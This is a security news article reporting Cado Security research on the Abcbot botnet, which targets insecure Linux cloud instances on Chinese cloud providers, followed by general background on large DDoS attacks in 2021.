Malicious shell script targets insecure cloud instances on Tencent, Baidu, and Alibaba cloud, removing competing threat actors and connecting to a botnet.
Last month security researchers noted that the new Abcbot botnet was showing worm-like propagation with the aim to infect Linux systems and a likely goal of launching future distributed-denial-of-service (DDoS) attacks.
First spotted in July, the malicious script was later named Abcbot based on its source path ‘abc-hello’ string.
Researchers at Cado Security spotted a novel development with the Abcbot to target insecure cloud instances running under Alibaba Cloud, Tencent, Baidu, and other cloud service providers (CSPs).
According to Matt Muir, a security researcher at Cado Security, the shell script prepares the target host for additional compromise over SSH.
Interestingly, the malware kills off processes from competing threat actors and persists itself before downloading an additional ELF executable used to connect to the Abcot botnet.
“What’s evident from analysis of this shell script is that the threat actor behind Abcbot is heavily invested in keeping their knowledge of the cloud security threat landscape current,” writes Muir.
The malware contains specific commands to remove crypto mining and cloud-focused malware from the host machine, such as WatchDog and Kinsing.
Research also points to threat actor targeting monitoring solutions used by Alibaba Cloud and Tencent, pointing to hackers targeting specific CSPs.
The report shows that Abcbot developers no longer route traffic from additional payloads over Tor, pointing to a novel way for obfuscating suspicious network activity.
The malicious shell script also allows for new ways to facilitate communication with a C2 server controlling the wider Abcbo botnet and a change in the installation script, compared to the one spotted previously.
Muir believes that the recent developments illustrate how the Abcbot campaign is rapidly maturing and may be used for DDoS attacks in the future.
2021 has already brought several major DDoS attacks to the table. Last month, A multi-vector attack peaked just under 2 Tbps, making it one of the largest ever recorded.
The distributed-denial-of-service (DDoS) attack against Yandex that was carried out from August to September clocked in at a humongous 22 million requests per second (RPS).
A DDoS caused internet outages in New Zealand when the country’s third-largest internet service provider was hit. The attack cut off around 15% of the country’s broadband customers from the internet at one point.
Recent reports show that 2021 will be yet another record year for the number of DDoS attacks carried out. Threat actors launched approximately 2.9 million DDoS attacks in the first quarter of 2021, a 31% increase from the same time in 2020.
During DDoS attacks, vast numbers of “bots” attack target computers. Hence, many entities attack a target, which explains the “distributed” part. The bots are infected computers spread across multiple locations. There isn’t a single host. You may be hosting a bot right now and not even know it.
When DDoS attackers direct their bots against a specific target, it has some pretty unpleasant effects. Most importantly, a DDoS attack aims to trigger a “denial of service” response for people using the target system. This takes the target network offline.
If you’ve repeatedly struggled to access a retail website, you may well have encountered a denial of service. And it can take hours or days to recover from.
More from CyberNews:
Subscribe to our newsletter